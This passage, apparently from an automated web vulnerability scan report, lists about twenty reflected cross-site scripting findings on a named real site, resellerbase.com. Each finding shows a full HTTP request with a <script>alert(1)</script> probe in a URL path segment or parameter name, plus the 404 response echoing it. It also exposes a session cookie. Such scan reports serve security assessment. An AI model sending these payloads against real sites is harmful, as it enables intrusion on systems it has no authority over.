<p>The requested URL /web-service/themes/kosmos/images/folder.gif?79b1a<script>alert(1)</script>25cdd6c090e=1 was not found on this server.</p>
...[SNIP]...

2.5386. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0d03<script>alert(1)</script>4b58cb2c4cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced0d03<script>alert(1)</script>4b58cb2c4cf/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced0d03<script>alert(1)</script>4b58cb2c4cf/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5387. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f32a<script>alert(1)</script>41dd630a29b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes3f32a<script>alert(1)</script>41dd630a29b/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes3f32a<script>alert(1)</script>41dd630a29b/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5388. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5d37<script>alert(1)</script>bddb2844e71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmose5d37<script>alert(1)</script>bddb2844e71/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmose5d37<script>alert(1)</script>bddb2844e71/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5389. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ec18e<script>alert(1)</script>c692e37f52 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesec18e<script>alert(1)</script>c692e37f52/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesec18e<script>alert(1)</script>c692e37f52/rating/ was not found on this server.</p>
...[SNIP]...

2.5390. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e080a<script>alert(1)</script>18b24a2ef95 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/ratinge080a<script>alert(1)</script>18b24a2ef95/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/ratinge080a<script>alert(1)</script>18b24a2ef95/ was not found on this server.</p>
...[SNIP]...

2.5391. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0b8f<script>alert(1)</script>9b77e73638d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/?c0b8f<script>alert(1)</script>9b77e73638d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/?c0b8f<script>alert(1)</script>9b77e73638d=1 was not found on this server.</p>
...[SNIP]...

2.5392. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0324<script>alert(1)</script>f46b13e8f37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceb0324<script>alert(1)</script>f46b13e8f37/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceb0324<script>alert(1)</script>f46b13e8f37/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5393. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5aa1<script>alert(1)</script>189a6e50b56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesa5aa1<script>alert(1)</script>189a6e50b56/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesa5aa1<script>alert(1)</script>189a6e50b56/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5394. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 561e1<script>alert(1)</script>be319626632 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos561e1<script>alert(1)</script>be319626632/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos561e1<script>alert(1)</script>be319626632/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5395. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 226e5<script>alert(1)</script>a5dafeabfa1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images226e5<script>alert(1)</script>a5dafeabfa1/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images226e5<script>alert(1)</script>a5dafeabfa1/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5396. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 969e4<script>alert(1)</script>586340e675d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating969e4<script>alert(1)</script>586340e675d/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating969e4<script>alert(1)</script>586340e675d/0.gif was not found on this server.</p>
...[SNIP]...

2.5397. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ebe76<script>alert(1)</script>80041d61cd3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/0.gifebe76<script>alert(1)</script>80041d61cd3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/0.gifebe76<script>alert(1)</script>80041d61cd3 was not found on this server.</p>
...[SNIP]...

2.5398. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 35c4a<script>alert(1)</script>38c1838fb7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/0.gif?35c4a<script>alert(1)</script>38c1838fb7a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/0.gif?35c4a<script>alert(1)</script>38c1838fb7a=1 was not found on this server.</p>
...[SNIP]...

2.5399. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b68b<script>alert(1)</script>5d087b534d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service6b68b<script>alert(1)</script>5d087b534d1/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service6b68b<script>alert(1)</script>5d087b534d1/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.5400. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91b3a<script>alert(1)</script>02f7f31956c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes91b3a<script>alert(1)</script>02f7f31956c/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes91b3a<script>alert(1)</script>02f7f31956c/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.5401. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e8202<script>alert(1)</script>a758876942b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmose8202<script>alert(1)</script>a758876942b/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmose8202<script>alert(1)</script>a758876942b/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.5402. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 920bc<script>alert(1)</script>634ccb1c656 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images920bc<script>alert(1)</script>634ccb1c656/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images920bc<script>alert(1)</script>634ccb1c656/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.5403. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97924<script>alert(1)</script>b465d77f2e5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating97924<script>alert(1)</script>b465d77f2e5/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating97924<script>alert(1)</script>b465d77f2e5/2half.gif was not found on this server.</p>
...[SNIP]...

2.5404. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8fdbc<script>alert(1)</script>2b2bf6c97ba was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/2half.gif8fdbc<script>alert(1)</script>2b2bf6c97ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/2half.gif8fdbc<script>alert(1)</script>2b2bf6c97ba was not found on this server.</p>
...[SNIP]...

2.5405. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d57e<script>alert(1)</script>a1e985cd575 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

